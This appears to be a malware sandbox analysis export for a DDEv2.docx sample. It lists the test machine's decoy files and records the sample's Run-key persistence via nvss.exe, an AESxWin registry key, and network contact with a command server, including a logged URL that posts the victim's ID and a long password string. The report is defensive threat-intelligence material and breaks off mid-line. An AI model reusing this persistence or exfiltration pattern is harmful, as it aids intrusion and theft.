users\kft6utqw\documents\lq5_4qumspxkagf3\0kc5nr5.rtf users\kft6utqw\documents\lq5_4qumspxkagf3\0kc5nr5.rtf c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\0kc5nr5.rtf rtf File users\kft6utqw\documents\lq5_4qumspxkagf3\9oiefcy.csv users\kft6utqw\documents\lq5_4qumspxkagf3\9oiefcy.csv c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\9oiefcy.csv csv File users\kft6utqw\documents\lq5_4qumspxkagf3\a2yhs.rtf users\kft6utqw\documents\lq5_4qumspxkagf3\a2yhs.rtf c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\a2yhs.rtf rtf File users\kft6utqw\documents\lq5_4qumspxkagf3\jjjmv9taw3hhvo.ods users\kft6utqw\documents\lq5_4qumspxkagf3\jjjmv9taw3hhvo.ods c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\jjjmv9taw3hhvo.ods ods File users\kft6utqw\documents\lq5_4qumspxkagf3\okb6ch9a4iqri_jw.csv users\kft6utqw\documents\lq5_4qumspxkagf3\okb6ch9a4iqri_jw.csv c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\okb6ch9a4iqri_jw.csv csv File users\kft6utqw\documents\lq5_4qumspxkagf3\pnxtgcqo4yh5r.odt users\kft6utqw\documents\lq5_4qumspxkagf3\pnxtgcqo4yh5r.odt c:\ c:\users\kft6utqw\documents\lq5_4qumspxkagf3\pnxtgcqo4yh5r.odt odt File users\kft6utqw\documents\31c8jf9y_xli.docx users\kft6utqw\documents\31c8jf9y_xli.docx c:\ c:\users\kft6utqw\documents\31c8jf9y_xli.docx docx File users\kft6utqw\documents\4mqnx-qcbrpg7.docx users\kft6utqw\documents\4mqnx-qcbrpg7.docx c:\ c:\users\kft6utqw\documents\4mqnx-qcbrpg7.docx docx File users\kft6utqw\documents\aonimexn t.xlsx users\kft6utqw\documents\aonimexn t.xlsx c:\ c:\users\kft6utqw\documents\aonimexn t.xlsx xlsx File users\kft6utqw\documents\bcatcic fci96kikr19.pptx users\kft6utqw\documents\bcatcic fci96kikr19.pptx c:\ c:\users\kft6utqw\documents\bcatcic fci96kikr19.pptx pptx File users\kft6utqw\documents\bdvwr.doc users\kft6utqw\documents\bdvwr.doc c:\ c:\users\kft6utqw\documents\bdvwr.doc doc File users\kft6utqw\documents\d-4thvumdh.csv users\kft6utqw\documents\d-4thvumdh.csv c:\ c:\users\kft6utqw\documents\d-4thvumdh.csv csv File users\kft6utqw\documents\ev0ylmk5921.pptx users\kft6utqw\documents\ev0ylmk5921.pptx c:\ c:\users\kft6utqw\documents\ev0ylmk5921.pptx pptx File users\kft6utqw\documents\fbmldmouw-tzoy_unn7.xlsx users\kft6utqw\documents\fbmldmouw-tzoy_unn7.xlsx c:\ c:\users\kft6utqw\documents\fbmldmouw-tzoy_unn7.xlsx xlsx File users\kft6utqw\documents\gxfwksunytgfj.pptx users\kft6utqw\documents\gxfwksunytgfj.pptx c:\ c:\users\kft6utqw\documents\gxfwksunytgfj.pptx pptx File users\kft6utqw\documents\hhx-9rkimupsnon0ejb.pptx users\kft6utqw\documents\hhx-9rkimupsnon0ejb.pptx c:\ c:\users\kft6utqw\documents\hhx-9rkimupsnon0ejb.pptx pptx File users\kft6utqw\documents\lcptyhqe.xlsx users\kft6utqw\documents\lcptyhqe.xlsx c:\ c:\users\kft6utqw\documents\lcptyhqe.xlsx xlsx File users\kft6utqw\documents\u5x9.ppt users\kft6utqw\documents\u5x9.ppt c:\ c:\users\kft6utqw\documents\u5x9.ppt ppt File users\kft6utqw\documents\wffphgzw1qt5nubkpq.docx users\kft6utqw\documents\wffphgzw1qt5nubkpq.docx c:\ c:\users\kft6utqw\documents\wffphgzw1qt5nubkpq.docx docx File users\kft6utqw\documents\zb6u3g7h.xlsx users\kft6utqw\documents\zb6u3g7h.xlsx c:\ c:\users\kft6utqw\documents\zb6u3g7h.xlsx xlsx File users\kft6utqw\documents\m-puio0zggg_ddsrzn.docx users\kft6utqw\documents\m-puio0zggg_ddsrzn.docx c:\ c:\users\kft6utqw\documents\m-puio0zggg_ddsrzn.docx docx File users\kft6utqw\documents\nfjvj4.docx users\kft6utqw\documents\nfjvj4.docx c:\ c:\users\kft6utqw\documents\nfjvj4.docx docx File users\kft6utqw\documents\q7ikh0ztpga.pptx users\kft6utqw\documents\q7ikh0ztpga.pptx c:\ c:\users\kft6utqw\documents\q7ikh0ztpga.pptx pptx File users\kft6utqw\documents\qis2t0idi.docx users\kft6utqw\documents\qis2t0idi.docx c:\ c:\users\kft6utqw\documents\qis2t0idi.docx docx File users\kft6utqw\documents\rltenk6-mjnoz-rauf3v.xlsx users\kft6utqw\documents\rltenk6-mjnoz-rauf3v.xlsx c:\ c:\users\kft6utqw\documents\rltenk6-mjnoz-rauf3v.xlsx xlsx File users\kft6utqw\pictures\e8b06t5z\joddd\hgzfj\-fs-r5u50bfkvf.png users\kft6utqw\pictures\e8b06t5z\joddd\hgzfj\-fs-r5u50bfkvf.png c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\hgzfj\-fs-r5u50bfkvf.png png File users\kft6utqw\pictures\e8b06t5z\joddd\hgzfj\z3txdnfa.bmp users\kft6utqw\pictures\e8b06t5z\joddd\hgzfj\z3txdnfa.bmp c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\hgzfj\z3txdnfa.bmp bmp File users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\3wlgr0fumkcnd1.png users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\3wlgr0fumkcnd1.png c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\3wlgr0fumkcnd1.png png File users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\8hsxlmz5fcchefkc.png users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\8hsxlmz5fcchefkc.png c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\8hsxlmz5fcchefkc.png png File users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\pr 2s.bmp users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\pr 2s.bmp c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\tmdcgsua1hpeixp_g-_\pr 2s.bmp bmp File users\kft6utqw\pictures\e8b06t5z\joddd\2mlpi.gif users\kft6utqw\pictures\e8b06t5z\joddd\2mlpi.gif c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\2mlpi.gif gif File users\kft6utqw\pictures\e8b06t5z\joddd\jp-9xm1bmm.gif users\kft6utqw\pictures\e8b06t5z\joddd\jp-9xm1bmm.gif c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\jp-9xm1bmm.gif gif File users\kft6utqw\pictures\e8b06t5z\joddd\m8qmiadbo6rfghx.png users\kft6utqw\pictures\e8b06t5z\joddd\m8qmiadbo6rfghx.png c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\m8qmiadbo6rfghx.png png File users\kft6utqw\pictures\e8b06t5z\joddd\_g8eg0.gif users\kft6utqw\pictures\e8b06t5z\joddd\_g8eg0.gif c:\ c:\users\kft6utqw\pictures\e8b06t5z\joddd\_g8eg0.gif gif File users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\c7fcn8b.bmp users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\c7fcn8b.bmp c:\ c:\users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\c7fcn8b.bmp bmp File users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\dhn.png users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\dhn.png c:\ c:\users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\dhn.png png File users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\hlufp.gif users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\hlufp.gif c:\ c:\users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\hlufp.gif gif File users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\hy7xic9tp5afulp5tba.gif users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\hy7xic9tp5afulp5tba.gif c:\ c:\users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\hy7xic9tp5afulp5tba.gif gif File users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\ljszdoyltsvld u.jpg users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\ljszdoyltsvld u.jpg c:\ c:\users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\ljszdoyltsvld u.jpg jpg File users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\metsfgadg8jkpvq.gif users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\metsfgadg8jkpvq.gif c:\ c:\users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\metsfgadg8jkpvq.gif gif File users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\qb7s9ah4l3t.png users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\qb7s9ah4l3t.png c:\ c:\users\kft6utqw\pictures\e8b06t5z\k-e 1jpgxeyukg\qb7s9ah4l3t.png png File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\btmvvnx cfkn1xv99u44.gif users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\btmvvnx cfkn1xv99u44.gif c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\btmvvnx cfkn1xv99u44.gif gif File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\c wnwie5.gif users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\c wnwie5.gif c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\c wnwie5.gif gif File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\zfdojvki.png users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\zfdojvki.png c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\vuewifeok\zfdojvki.png png File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\-4w-q4wd1z.bmp users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\-4w-q4wd1z.bmp c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\-4w-q4wd1z.bmp bmp File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\fs30oromojdbc.gif users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\fs30oromojdbc.gif c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\fs30oromojdbc.gif gif File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\kfh dlkg2staglp.jpg users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\kfh dlkg2staglp.jpg c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\kfh dlkg2staglp.jpg jpg File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\kvhysdzay9p7no8z735z.png users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\kvhysdzay9p7no8z735z.png c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\kvhysdzay9p7no8z735z.png png File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\pffh.bmp users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\pffh.bmp c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\w26w\pffh.bmp bmp File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\hj3hcknndjhrdyob.bmp users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\hj3hcknndjhrdyob.bmp c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\hj3hcknndjhrdyob.bmp bmp File users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\iq814t.jpg users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\iq814t.jpg c:\ c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\iq814t.jpg jpg File users\kft6utqw\pictures\e8b06t5z\s-t1dx_aj3.bmp users\kft6utqw\pictures\e8b06t5z\s-t1dx_aj3.bmp c:\ c:\users\kft6utqw\pictures\e8b06t5z\s-t1dx_aj3.bmp bmp File users\kft6utqw\pictures\4nz6fd 37umclhfq6.gif users\kft6utqw\pictures\4nz6fd 37umclhfq6.gif c:\ c:\users\kft6utqw\pictures\4nz6fd 37umclhfq6.gif gif File users\kft6utqw\pictures\dxfmoruezqji.bmp users\kft6utqw\pictures\dxfmoruezqji.bmp c:\ c:\users\kft6utqw\pictures\dxfmoruezqji.bmp bmp File users\kft6utqw\pictures\ijyzg07wazvwa6fxqh0.gif users\kft6utqw\pictures\ijyzg07wazvwa6fxqh0.gif c:\ c:\users\kft6utqw\pictures\ijyzg07wazvwa6fxqh0.gif gif File users\kft6utqw\pictures\np za.bmp users\kft6utqw\pictures\np za.bmp c:\ c:\users\kft6utqw\pictures\np za.bmp bmp File users\kft6utqw\pictures\oypzzx.jpg users\kft6utqw\pictures\oypzzx.jpg c:\ c:\users\kft6utqw\pictures\oypzzx.jpg jpg File users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\cqqmpg-jbive.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\cqqmpg-jbive.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\cqqmpg-jbive.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\eh1oc xshc.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\eh1oc xshc.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\eh1oc xshc.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\jmrfgsolm2gk_qf.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\jmrfgsolm2gk_qf.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\jmrfgsolm2gk_qf.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\mtd6xqw0jrc8h.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\mtd6xqw0jrc8h.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\mtd6xqw0jrc8h.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\d xgp5yxo\zxoge.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\d xgp5yxo\zxoge.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\d xgp5yxo\zxoge.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\b95u.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\b95u.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\b95u.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\m9qfpaq6hssl8whb.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\m9qfpaq6hssl8whb.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\m9qfpaq6hssl8whb.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\mmtrdlygm.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\mmtrdlygm.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\mmtrdlygm.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\om rimvmjxnxzplia-.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\om rimvmjxnxzplia-.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\om rimvmjxnxzplia-.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\bdvgdqlhd8y.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\bdvgdqlhd8y.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\bdvgdqlhd8y.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\ldkh5kxqmk43.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\ldkh5kxqmk43.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\ldkh5kxqmk43.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\bpwdqbd367v5jcwf.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\bpwdqbd367v5jcwf.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\bpwdqbd367v5jcwf.wav wav File users\kft6utqw\music\e1mt woaqipijv7ecvn\lbtiev6ysxhhxcjq.wav users\kft6utqw\music\e1mt woaqipijv7ecvn\lbtiev6ysxhhxcjq.wav c:\ c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\lbtiev6ysxhhxcjq.wav wav File users\kft6utqw\music\giud.wav users\kft6utqw\music\giud.wav c:\ c:\users\kft6utqw\music\giud.wav wav File users\kft6utqw\music\qnsmqvcmaaiuq5u.wav users\kft6utqw\music\qnsmqvcmaaiuq5u.wav c:\ c:\users\kft6utqw\music\qnsmqvcmaaiuq5u.wav wav File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\eyqf5ksecamn6njljm\y3m6chihdf_yy2sbaze.avi users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\eyqf5ksecamn6njljm\y3m6chihdf_yy2sbaze.avi c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\eyqf5ksecamn6njljm\y3m6chihdf_yy2sbaze.avi avi File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\ejvttmxbiz6sbbuew.swf users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\ejvttmxbiz6sbbuew.swf c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\ejvttmxbiz6sbbuew.swf swf File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\xstc7qezlhs _ste0b.avi users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\xstc7qezlhs _ste0b.avi c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\xstc7qezlhs _ste0b.avi avi File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\wqhnocgb21accc\4m2t-htfvxv73.swf users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\wqhnocgb21accc\4m2t-htfvxv73.swf c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\wqhnocgb21accc\4m2t-htfvxv73.swf swf File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\-vero sqdwv.avi users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\-vero sqdwv.avi c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\-vero sqdwv.avi avi File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\trj26cc8jkp.flv users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\trj26cc8jkp.flv c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\trj26cc8jkp.flv flv File users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\ubdjlycr8a-tta.mp4 users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\ubdjlycr8a-tta.mp4 c:\ c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\ubdjlycr8a-tta.mp4 mp4 File users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\7x-gm.flv users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\7x-gm.flv c:\ c:\users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\7x-gm.flv flv File users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\l1v__tjshnxi.avi users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\l1v__tjshnxi.avi c:\ c:\users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\l1v__tjshnxi.avi avi File users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\ppcn9b5q exh-k00.avi users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\ppcn9b5q exh-k00.avi c:\ c:\users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\ppcn9b5q exh-k00.avi avi File users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\zweitqpq 5l.mp4 users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\zweitqpq 5l.mp4 c:\ c:\users\kft6utqw\videos\extoa\ijyi ku9gkwyypfgatz\zweitqpq 5l.mp4 mp4 File users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\4wdnacepkp.swf users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\4wdnacepkp.swf c:\ c:\users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\4wdnacepkp.swf swf File users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\dew6bprqznyzf.mp4 users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\dew6bprqznyzf.mp4 c:\ c:\users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\dew6bprqznyzf.mp4 mp4 File users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\fcaccqtqf.mp4 users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\fcaccqtqf.mp4 c:\ c:\users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\fcaccqtqf.mp4 mp4 File users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\j2ajphasg.mp4 users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\j2ajphasg.mp4 c:\ c:\users\kft6utqw\videos\extoa\r-_fu8vdku2twrl\j2ajphasg.mp4 mp4 File users\kft6utqw\videos\extoa\empw-4aliy3p9rubm.mp4 users\kft6utqw\videos\extoa\empw-4aliy3p9rubm.mp4 c:\ c:\users\kft6utqw\videos\extoa\empw-4aliy3p9rubm.mp4 mp4 File users\kft6utqw\videos\extoa\jjrutzgc0aqoiwvu.flv users\kft6utqw\videos\extoa\jjrutzgc0aqoiwvu.flv c:\ c:\users\kft6utqw\videos\extoa\jjrutzgc0aqoiwvu.flv flv File users\kft6utqw\videos\extoa\pi8ct7hfk.avi users\kft6utqw\videos\extoa\pi8ct7hfk.avi c:\ c:\users\kft6utqw\videos\extoa\pi8ct7hfk.avi avi File users\kft6utqw\videos\tydhicm2z.flv users\kft6utqw\videos\tydhicm2z.flv c:\ c:\users\kft6utqw\videos\tydhicm2z.flv flv File users\kft6utqw\desktop\1zxeg6xm\cnh\1lwqeuu.xls users\kft6utqw\desktop\1zxeg6xm\cnh\1lwqeuu.xls c:\ c:\users\kft6utqw\desktop\1zxeg6xm\cnh\1lwqeuu.xls xls File users\kft6utqw\desktop\1zxeg6xm\cnh\8ir7b9do0uh.png users\kft6utqw\desktop\1zxeg6xm\cnh\8ir7b9do0uh.png c:\ c:\users\kft6utqw\desktop\1zxeg6xm\cnh\8ir7b9do0uh.png png File users\kft6utqw\desktop\1zxeg6xm\cnh\sakdpf0xtjzy.png users\kft6utqw\desktop\1zxeg6xm\cnh\sakdpf0xtjzy.png c:\ c:\users\kft6utqw\desktop\1zxeg6xm\cnh\sakdpf0xtjzy.png png WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER nvsvc32 nvsvc32 C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe REG_SZ WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER nvsvc32 nvsvc32 WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time HKEY_LOCAL_MACHINE TZI MUI_Display MUI_Display MUI_Std MUI_Std MUI_Dlt MUI_Dlt WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST HKEY_LOCAL_MACHINE FirstEntry FirstEntry LastEntry LastEntry 2007 2008 WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId WinRegistryKey SOFTWARE\AESxWin HKEY_CURRENT_USER ComputerId ComputerId 0b75c6dd-d172-492e-b7be-2c05de30e808 REG_SZ SocketAddress 176.58.123.25 443 TCP NetworkSocket 176.58.123.25 443 TCP Contains SocketAddress 82.221.129.19 80 TCP NetworkSocket 82.221.129.19 80 TCP Contains SocketAddress beer-ranking.pl 80 NetworkConnection HTTP beer-ranking.pl 80 URI beer-ranking.pl/gen/ Contains URI beer-ranking.pl/login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02 Contains URI beer-ranking.pl/save.txt Contains File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE File users\kft6utqw\appdata\roaminghhfhqi2h.wln.bat users\kft6utqw\appdata\roaminghhfhqi2h.wln.bat c:\ c:\users\kft6utqw\appdata\roaminghhfhqi2h.wln.bat bat File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE Analyzed Sample #19692 Malware Artifacts 19692 Sample-ID: #19692 Job-ID: #11514 This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #19692 Submission-ID: #19847 C:\Users\kFT6uTQW\Desktop\DDEv2.docx docx MD5 5786dbcbe1959b2978e979bf1c5cb450 SHA1 0dd5a58e89036beaa7a63c9f5541bf1402c9c4d4 SHA256 bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 Opened_By Metadata of Analysis for Job-ID #11514 Timeout True x86 64-bit 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) win7_64_sp1-mso2007 True 157.456 Windows 7 This is a property collection for additional information of VMRay analysis VMRay Analyzer Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name 